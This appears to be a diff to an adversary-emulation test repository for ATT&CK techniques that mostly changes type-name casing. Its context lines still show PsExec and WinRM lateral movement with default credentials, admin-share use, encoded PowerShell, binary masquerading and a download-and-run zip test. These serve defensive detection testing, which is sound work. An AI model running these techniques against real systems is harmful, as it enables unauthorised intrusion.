+| password | Password | string | P@ssw0rd1|
+| computer_name | Target Computer Name | string | Target|


 #### Attack Commands: Run with `command_prompt`! 
@@ -70,9 +70,9 @@ Map Admin share utilizing PowerShell
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| share_name | Examples C$, IPC$, Admin$ | String | C$|
-| map_name | Mapped Drive Letter | String | g|
-| computer_name | Target Computer Name | String | Target|
+| share_name | Examples C$, IPC$, Admin$ | string | C$|
+| map_name | Mapped Drive Letter | string | g|
+| computer_name | Target Computer Name | string | Target|


 #### Attack Commands: Run with `powershell`! 
@@ -105,8 +105,8 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| command_path | File to copy and execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-| remote_host | Remote computer to receive the copy and execute the file | String | &#92;&#92;localhost|
+| command_path | File to copy and execute | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
+| remote_host | Remote computer to receive the copy and execute the file | string | &#92;&#92;localhost|
 | psexec_exe | Path to PsExec | string | C:&#92;PSTools&#92;PsExec.exe|


@@ -156,8 +156,8 @@ This technique is used by post-exploitation frameworks.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Remote computer to receive the copy and execute the file | String | output.txt|
-| command_to_execute | Command to execute for output. | String | hostname|
+| output_file | Remote computer to receive the copy and execute the file | string | output.txt|
+| command_to_execute | Command to execute for output. | string | hostname|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -10,19 +10,19 @@ atomic_tests:
  input_arguments:
    user_name:
      description: Username
-      type: String
+      type: string
      default: DOMAIN\Administrator
    share_name:
      description: Examples C$, IPC$, Admin$
-      type: String
+      type: string
      default: C$
    password:
      description: Password
-      type: String
+      type: string
      default: P@ssw0rd1
    computer_name:
      description: Target Computer Name
-      type: String
+      type: string
      default: Target
  executor:
    command: |
@@ -37,15 +37,15 @@ atomic_tests:
  input_arguments:
    share_name:
      description: Examples C$, IPC$, Admin$
-      type: String
+      type: string
      default: C$
    map_name:
      description: Mapped Drive Letter
-      type: String
+      type: string
      default: g
    computer_name:
      description: Target Computer Name
-      type: String
+      type: string
      default: Target
  executor:
    command: |
@@ -60,11 +60,11 @@ atomic_tests:
  input_arguments:
    command_path:
      description: File to copy and execute
-      type: Path
+      type: path
      default: C:\Windows\System32\cmd.exe
    remote_host:
      description: Remote computer to receive the copy and execute the file
-      type: String
+      type: string
      default: '\\localhost'
    psexec_exe:
      description: Path to PsExec
@@ -96,16 +96,14 @@ atomic_tests:
  input_arguments:
    output_file:
      description: Remote computer to receive the copy and execute the file
-      type: String
+      type: string
      default: output.txt
    command_to_execute:
      description: Command to execute for output.
-      type: String
+      type: string
      default: hostname
  executor:
    command: |
      cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
    name: command_prompt
    elevation_required: true
-
-
@@ -36,7 +36,7 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| computer_name | Name of Computer | String | localhost|
+| computer_name | Name of Computer | string | localhost|


 #### Attack Commands: Run with `powershell`! 
@@ -16,7 +16,7 @@ atomic_tests:
  input_arguments:
    computer_name:
      description: Name of Computer
-      type: String
+      type: string
      default: localhost
  executor:
    command: |
@@ -95,9 +95,9 @@ An adversary may attempt to use Evil-WinRM with a valid account to interact with
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| user_name | Username | String | Domain&#92;Administrator|
-| destination_address | Remote Host IP or Hostname | String | Target|
-| password | Password | String | P@ssw0rd1|
+| user_name | Username | string | Domain&#92;Administrator|
+| destination_address | Remote Host IP or Hostname | string | Target|
+| password | Password | string | P@ssw0rd1|


 #### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
@@ -28,7 +28,7 @@ atomic_tests:
      Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami}
    cleanup_command: Disable-PSRemoting -Force
    name: powershell
-    
+
 - name: WinRM Access with Evil-WinRM
  auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
  description: An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
@@ -37,15 +37,15 @@ atomic_tests:
  input_arguments:
    user_name:
      description: Username
-      type: String
+      type: string
      default: Domain\Administrator
    destination_address:
      description: Remote Host IP or Hostname
-      type: String
+      type: string
      default: Target
    password:
      description: Password
-      type: String
+      type: string
      default: P@ssw0rd1
  dependency_executor_name: powershell
  dependencies:
@@ -28,7 +28,7 @@ Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expe
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
+| file_to_pad | Path of binary to be padded | path | /tmp/evil-binary|


 #### Attack Commands: Run with `sh`! 
@@ -13,7 +13,7 @@ atomic_tests:
  input_arguments:
    file_to_pad:
      description: Path of binary to be padded
-      type: Path
+      type: path
      default: /tmp/evil-binary
  dependency_executor_name: bash
  dependencies:
@@ -29,4 +29,3 @@ atomic_tests:
    cleanup_command: |
      rm #{file_to_pad}
    name: sh
-
@@ -33,7 +33,7 @@ No other protection/compression were applied.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx|
+| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx|


 #### Attack Commands: Run with `sh`! 
@@ -73,7 +73,7 @@ by some methods, and especially UPX is not able to uncompress it any more.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed|
+| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed|


 #### Attack Commands: Run with `sh`! 
@@ -111,7 +111,7 @@ No other protection/compression were applied.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx|
+| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx|


 #### Attack Commands: Run with `sh`! 
@@ -151,7 +151,7 @@ by some methods, and especially UPX is not able to uncompress it any more.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed|
+| bin_path | Packed binary | path | PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed|


 #### Attack Commands: Run with `sh`! 
@@ -11,7 +11,7 @@ atomic_tests:
  input_arguments:
    bin_path:
      description: Packed binary
-      type: Path
+      type: path
      default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx
  executor:
    command: |
@@ -31,7 +31,7 @@ atomic_tests:
  input_arguments:
    bin_path:
      description: Packed binary
-      type: Path
+      type: path
      default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed
  executor:
    command: |
@@ -49,7 +49,7 @@ atomic_tests:
  input_arguments:
    bin_path:
      description: Packed binary
-      type: Path
+      type: path
      default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx
  executor:
    command: |
@@ -69,7 +69,7 @@ atomic_tests:
  input_arguments:
    bin_path:
      description: Packed binary
-      type: Path
+      type: path
      default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed
  executor:
    command: |
@@ -77,4 +77,3 @@ atomic_tests:
    cleanup_command: |
      rm /tmp/packed_bin
    name: sh
-
@@ -35,8 +35,8 @@ Upon execution an exe named T1027.004.exe will be placed in the temp folder
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| output_file | Output compiled binary | Path | C:&#92;Windows&#92;Temp&#92;T1027.004.exe|
-| input_file | C# code that launches calc.exe from a hidden cmd.exe Window | Path | PathToAtomicsFolder&#92;T1027.004&#92;src&#92;calc.cs|
+| output_file | Output compiled binary | path | C:&#92;Windows&#92;Temp&#92;T1027.004.exe|
+| input_file | C# code that launches calc.exe from a hidden cmd.exe Window | path | PathToAtomicsFolder&#92;T1027.004&#92;src&#92;calc.cs|


 #### Attack Commands: Run with `command_prompt`! 
@@ -89,7 +89,7 @@ Upon execution, the exe will print 'T1027.004 Dynamic Compile'.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| input_file | exe program containing dynamically compiled C# code | Path | PathToAtomicsFolder&#92;T1027.004&#92;bin&#92;T1027.004_DynamicCompile.exe|
+| input_file | exe program containing dynamically compiled C# code | path | PathToAtomicsFolder&#92;T1027.004&#92;bin&#92;T1027.004_DynamicCompile.exe|


 #### Attack Commands: Run with `powershell`! 
@@ -134,7 +134,7 @@ Compile a c file with either gcc or clang on Linux or Macos.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| input_file | source file | Path | PathToAtomicsFolder/T1027.004/src/T1027-004-test.c|
+| input_file | source file | path | PathToAtomicsFolder/T1027.004/src/T1027-004-test.c|


 #### Attack Commands: Run with `bash`! 
@@ -180,7 +180,7 @@ Compile a c file with either gcc or clang on Linux or Macos.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| input_file | source file | Path | PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc|
+| input_file | source file | path | PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc|


 #### Attack Commands: Run with `bash`! 
@@ -226,7 +226,7 @@ Compile a c file with either gcc or clang on Linux or Macos.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| input_file | source file | Path | PathToAtomicsFolder/T1027.004/src/T1027-004-test.go|
+| input_file | source file | path | PathToAtomicsFolder/T1027.004/src/T1027-004-test.go|


 #### Attack Commands: Run with `bash`! 
@@ -11,11 +11,11 @@ atomic_tests:
  input_arguments:
    output_file:
      description: Output compiled binary
-      type: Path
+      type: path
      default: C:\Windows\Temp\T1027.004.exe
    input_file:
      description: C# code that launches calc.exe from a hidden cmd.exe Window
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1027.004\src\calc.cs
  dependency_executor_name: powershell
  dependencies:
@@ -44,7 +44,7 @@ atomic_tests:
  input_arguments:
    input_file:
      description: exe program containing dynamically compiled C# code
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1027.004\bin\T1027.004_DynamicCompile.exe
  dependency_executor_name: powershell
  dependencies:
@@ -69,7 +69,7 @@ atomic_tests:
  input_arguments:
    input_file:
      description: source file
-      type: Path
+      type: path
      default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.c
  dependency_executor_name: sh
  dependencies:
@@ -94,7 +94,7 @@ atomic_tests:
  input_arguments:
    input_file:
      description: source file
-      type: Path
+      type: path
      default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc
  dependency_executor_name: sh
  dependencies:
@@ -119,7 +119,7 @@ atomic_tests:
  input_arguments:
    input_file:
      description: source file
-      type: Path
+      type: path
      default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.go
  dependency_executor_name: sh
  dependencies:
@@ -133,4 +133,3 @@ atomic_tests:
    command: |
      go run #{input_file}
    name: bash
-
@@ -47,7 +47,7 @@ and uname -v
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| shell_command | command to encode | String | echo Hello from the Atomic Red Team && uname -v|
+| shell_command | command to encode | string | echo Hello from the Atomic Red Team && uname -v|


 #### Attack Commands: Run with `sh`! 
@@ -101,7 +101,7 @@ Upon successful execution, powershell will execute an encoded command and stdout
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
+| powershell_command | PowerShell command to encode | string | Write-Host "Hey, Atomic!"|


 #### Attack Commands: Run with `powershell`! 
@@ -140,9 +140,9 @@ Upon successful execution, powershell will execute encoded command and read/writ
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| registry_key_storage | Windows Registry Key to store code | String | HKCU:Software&#92;Microsoft&#92;Windows&#92;CurrentVersion|
-| powershell_command | PowerShell command to encode | String | Write-Host "Hey, Atomic!"|
-| registry_entry_storage | Windows Registry entry to store code under key | String | Debug|
+| registry_key_storage | Windows Registry Key to store code | string | HKCU:Software&#92;Microsoft&#92;Windows&#92;CurrentVersion|
+| powershell_command | PowerShell command to encode | string | Write-Host "Hey, Atomic!"|
+| registry_entry_storage | Windows Registry entry to store code under key | string | Debug|


 #### Attack Commands: Run with `powershell`! 
@@ -185,7 +185,7 @@ Mimic execution of compressed executable. When successfully executed, calculator
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| url_path | url to download Exe | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip|
+| url_path | url to download Exe | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip|


 #### Attack Commands: Run with `command_prompt`! 
@@ -239,10 +239,10 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| input_file | Path of the XLSM file | Path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
-| sender | sender email | String | test@corp.com|
-| receiver | receiver email | String | test@corp.com|
-| smtp_server | SMTP Server IP Address | String | 127.0.0.1|
+| input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
+| sender | sender email | string | test@corp.com|
+| receiver | receiver email | string | test@corp.com|
+| smtp_server | SMTP Server IP Address | string | 127.0.0.1|


 #### Attack Commands: Run with `powershell`! 
@@ -276,8 +276,8 @@ Sensitive data includes about around 20 odd simulated credit card numbers that p
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| input_file | Path of the XLSM file | Path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
-| ip_address | Destination IP address | String | 127.0.0.1|
+| input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
+| ip_address | Destination IP address | string | 127.0.0.1|


 #### Attack Commands: Run with `powershell`! 
@@ -340,8 +340,8 @@ https://wietze.github.io/blog/windows-command-line-obfuscation
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| remote_file | URL of file to download | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
-| local_path | Local path/filename to save the dowloaded file to | Path | Atomic-license.txt|
+| remote_file | URL of file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
+| local_path | Local path/filename to save the dowloaded file to | path | Atomic-license.txt|

 #### Run it with these steps! 
 1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename.
@@ -14,7 +14,7 @@ atomic_tests:
  input_arguments:
    shell_command:
      description: command to encode
-      type: String
+      type: string
      default: "echo Hello from the Atomic Red Team && uname -v"
  dependency_executor_name: sh
  dependencies:
@@ -44,7 +44,7 @@ atomic_tests:
  input_arguments:
    powershell_command:
      description: PowerShell command to encode
-      type: String
+      type: string
      default: Write-Host "Hey, Atomic!"
  executor:
    command: |
@@ -65,15 +65,15 @@ atomic_tests:
  input_arguments:
    registry_key_storage:
      description: Windows Registry Key to store code
-      type: String
+      type: string
      default: HKCU:Software\Microsoft\Windows\CurrentVersion
    powershell_command:
      description: PowerShell command to encode
-      type: String
+      type: string
      default: Write-Host "Hey, Atomic!"
    registry_entry_storage:
      description: Windows Registry entry to store code under key
-      type: String
+      type: string
      default: Debug
  executor:
    command: |
@@ -96,7 +96,7 @@ atomic_tests:
  input_arguments:
    url_path:
      description: url to download Exe
-      type: Url
+      type: url
      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip
  dependency_executor_name: powershell
  dependencies:
@@ -126,19 +126,19 @@ atomic_tests:
  input_arguments:
    input_file:
      description: Path of the XLSM file
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
    sender:
      description: sender email
-      type: String
+      type: string
      default: test@corp.com
    receiver:
      description: receiver email
-      type: String
+      type: string
      default: test@corp.com
    smtp_server:
      description: SMTP Server IP Address
-      type: String
+      type: string
      default: 127.0.0.1
  executor:
    command: |
@@ -154,11 +154,11 @@ atomic_tests:
  input_arguments:
    input_file:
      description: Path of the XLSM file
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
    ip_address:
      description: Destination IP address
-      type: String
+      type: string
      default: 127.0.0.1
  executor:
    command: |
@@ -185,11 +185,11 @@ atomic_tests:
  input_arguments:
    remote_file:
      description: URL of file to download
-      type: Url
+      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    local_path:
      description: Local path/filename to save the dowloaded file to
-      type: Path
+      type: path
      default: Atomic-license.txt
  executor:
    steps: |
@@ -24,8 +24,8 @@ Take a file/directory, split it into 5Mb chunks
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| file_name | File name | Path | T1030_urandom|
-| folder_path | Path where the test creates artifacts | Path | /tmp/T1030|
+| file_name | File name | path | T1030_urandom|
+| folder_path | Path where the test creates artifacts | path | /tmp/T1030|


 #### Attack Commands: Run with `sh`! 
@@ -11,11 +11,11 @@ atomic_tests:
  input_arguments:
    file_name:
      description: File name
-      type: Path
+      type: path
      default: T1030_urandom
    folder_path:
      description: Path where the test creates artifacts
-      type: Path
+      type: path
      default: /tmp/T1030
  dependency_executor_name: sh
  dependencies:
@@ -31,4 +31,3 @@ atomic_tests:
    cleanup_command: |
      if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
    name: sh
-
@@ -37,7 +37,7 @@ Additionally, two files will be written to disk - computers.txt and usernames.tx
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| computer_name | Name of remote computer | String | localhost|
+| computer_name | Name of remote computer | string | localhost|


 #### Attack Commands: Run with `command_prompt`! 
@@ -13,7 +13,7 @@ atomic_tests:
  input_arguments:
    computer_name:
      description: Name of remote computer
-      type: String
+      type: string
      default: localhost
  executor:
    command: |
@@ -217,8 +217,8 @@ Upon successful execution, powershell will execute T1036.003.exe as svchost.exe
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| outputfile | path of file to execute | Path | ($env:TEMP + "&#92;svchost.exe")|
-| inputfile | path of file to copy | Path | PathToAtomicsFolder&#92;T1036.003&#92;bin&#92;T1036.003.exe|
+| outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
+| inputfile | path of file to copy | path | PathToAtomicsFolder&#92;T1036.003&#92;bin&#92;T1036.003.exe|


 #### Attack Commands: Run with `powershell`! 
@@ -270,8 +270,8 @@ Copies a windows exe, renames it as another windows exe, and launches it to masq
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| outputfile | path of file to execute | Path | ($env:TEMP + "&#92;svchost.exe")|
-| inputfile | path of file to copy | Path | $env:ComSpec|
+| outputfile | path of file to execute | path | ($env:TEMP + "&#92;svchost.exe")|
+| inputfile | path of file to copy | path | $env:ComSpec|


 #### Attack Commands: Run with `powershell`! 
@@ -349,9 +349,9 @@ e.g SOME_LEGIT_NAME.[doc,docx,xls,xlsx,pdf,rtf,png,jpg,etc.].[exe,vbs,js,ps1,etc
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| exe_path | path to exe to use when creating masquerading files | Path | C:&#92;Windows&#92;System32&#92;calc.exe|
-| vbs_path | path of vbs to use when creating masquerading files | Path | PathToAtomicsFolder&#92;T1036.003&#92;src&#92;T1036.003_masquerading.vbs|
-| ps1_path | path of powershell script to use when creating masquerading files | Path | PathToAtomicsFolder&#92;T1036.003&#92;src&#92;T1036.003_masquerading.ps1|
+| exe_path | path to exe to use when creating masquerading files | path | C:&#92;Windows&#92;System32&#92;calc.exe|
+| vbs_path | path of vbs to use when creating masquerading files | path | PathToAtomicsFolder&#92;T1036.003&#92;src&#92;T1036.003_masquerading.vbs|
+| ps1_path | path of powershell script to use when creating masquerading files | path | PathToAtomicsFolder&#92;T1036.003&#92;src&#92;T1036.003_masquerading.ps1|


 #### Attack Commands: Run with `command_prompt`! 
@@ -87,11 +87,11 @@ atomic_tests:
  input_arguments:
    outputfile:
      description: path of file to execute
-      type: Path
+      type: path
      default: ($env:TEMP + "\svchost.exe")
    inputfile:
      description: path of file to copy
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1036.003\bin\T1036.003.exe
  dependency_executor_name: powershell
  dependencies:
@@ -119,11 +119,11 @@ atomic_tests:
  input_arguments:
    outputfile:
      description: path of file to execute
-      type: Path
+      type: path
      default: ($env:TEMP + "\svchost.exe")
    inputfile:
      description: path of file to copy
-      type: Path
+      type: path
      default: $env:ComSpec
  executor:
    command: |
@@ -162,32 +162,32 @@ atomic_tests:
  input_arguments:
    exe_path:
      description: path to exe to use when creating masquerading files
-      type: Path
+      type: path
      default: C:\Windows\System32\calc.exe
    vbs_path:
      description: path of vbs to use when creating masquerading files
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs
    ps1_path:
      description: path of powershell script to use when creating masquerading files
-      type: Path
+      type: path
      default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.ps1
  dependency_executor_name: powershell
  dependencies:
-    - description: |
-        File to copy must exist on disk at specified location (#{vbs_path})
-      prereq_command: |
-        if (Test-Path #{vbs_path}) {exit 0} else {exit 1}
-      get_prereq_command: |
-        New-Item -Type Directory (split-path #{vbs_path}) -ErrorAction ignore | Out-Null
-        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}"
-    - description: |
-        File to copy must exist on disk at specified location (#{ps1_path})
-      prereq_command: |
-        if (Test-Path #{ps1_path}) {exit 0} else {exit 1}
-      get_prereq_command: |
-        New-Item -Type Directory (split-path #{ps1_path}) -ErrorAction ignore | Out-Null
-        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}"
+  - description: |
+      File to copy must exist on disk at specified location (#{vbs_path})
+    prereq_command: |
+      if (Test-Path #{vbs_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{vbs_path}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}"
+  - description: |
+      File to copy must exist on disk at specified location (#{ps1_path})
+    prereq_command: |
+      if (Test-Path #{ps1_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{ps1_path}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}"
  executor:
    command: |
      copy #{exe_path} %temp%\T1036.003_masquerading.docx.exe /Y
@@ -219,4 +219,3 @@ atomic_tests:
      del /f %temp%\T1036.003_masquerading.pdf.ps1 > nul 2>&1
      del /f %temp%\T1036.003_masquerading.rtf.ps1 > nul 2>&1
    name: command_prompt
-
@@ -28,7 +28,7 @@ Create and execute a process from a directory masquerading as the current parent
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1|
+| test_message | Test message to echo out to the screen | string | Hello from the Atomic Red Team test T1036.005#1|


 #### Attack Commands: Run with `sh`! 
@@ -68,7 +68,7 @@ Launch an executable that attempts to masquerade as a legitimate executable.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| executable_filepath | File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. | String | $Env:windir&#92;Temp&#92;svchost.exe|
+| executable_filepath | File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. | string | $Env:windir&#92;Temp&#92;svchost.exe|


 #### Attack Commands: Run with `powershell`! 
@@ -6,12 +6,12 @@ atomic_tests:
  description: |
    Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
  supported_platforms:
-    - macos
-    - linux
+  - macos
+  - linux
  input_arguments:
    test_message:
      description: Test message to echo out to the screen
-      type: String
+      type: string
      default: Hello from the Atomic Red Team test T1036.005#1
  executor:
    name: sh
@@ -32,7 +32,7 @@ atomic_tests:
  input_arguments:
    executable_filepath:
      description: File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility.
-      type: String
+      type: string
      default: $Env:windir\Temp\svchost.exe
  executor:
    command: |
@@ -43,7 +43,7 @@ atomic_tests:
          }
      }
      '@ -OutputAssembly "#{executable_filepath}"
-      
+
      Start-Process -FilePath "#{executable_filepath}"
    cleanup_command: |
      Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
@@ -63,7 +63,7 @@ When the file is unzipped and the README.cmd file opened, it executes and change
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| url | Location of zip file | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip|
+| url | Location of zip file | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip|


 #### Attack Commands: Run with `powershell`! 
@@ -1,41 +1,41 @@
-attack_technique: T1036
-display_name: "Masquerading"
-atomic_tests:
- name: System File Copied to Unusual Location
-  auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
-  description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
-  supported_platforms:
-  - windows
-  executor:
-    command: |-
-      copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
-      start-process "$env:allusersprofile\cmd.exe"
-      sleep -s 5 
-      stop-process -name "cmd" | out-null
-    cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue
-    name: powershell
- name: Malware Masquerading and Execution from Zip File
-  auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc
-  description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
-  supported_platforms:
-  - windows
-  input_arguments:
-    url:
-      description: Location of zip file
-      type: Url
-      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
-  dependencies:
-  - description: Zip file must be present.
-    prereq_command: |
-      if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
-    get_prereq_command: |
-      Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
-  executor:
-    command: |-
-      Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
-      cd $env:userprofile\Downloads\T1036
-      cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
-    cleanup_command: |-
-      taskkill /IM Calculator.exe /f >$null 2>$null
-      Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
-    name: powershell
+attack_technique: T1036
+display_name: "Masquerading"
+atomic_tests:
+- name: System File Copied to Unusual Location
+  auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
+  description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
+      start-process "$env:allusersprofile\cmd.exe"
+      sleep -s 5 
+      stop-process -name "cmd" | out-null
+    cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue
+    name: powershell
+- name: Malware Masquerading and Execution from Zip File
+  auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc
+  description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
+  supported_platforms:
+  - windows
+  input_arguments:
+    url:
+      description: Location of zip file
+      type: url
+      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
+  dependencies:
+  - description: Zip file must be present.
+    prereq_command: |
+      if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
+  executor:
+    command: |-
+      Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
+      cd $env:userprofile\Downloads\T1036
+      cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
+    cleanup_command: |-
+      taskkill /IM Calculator.exe /f >$null 2>$null
+      Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
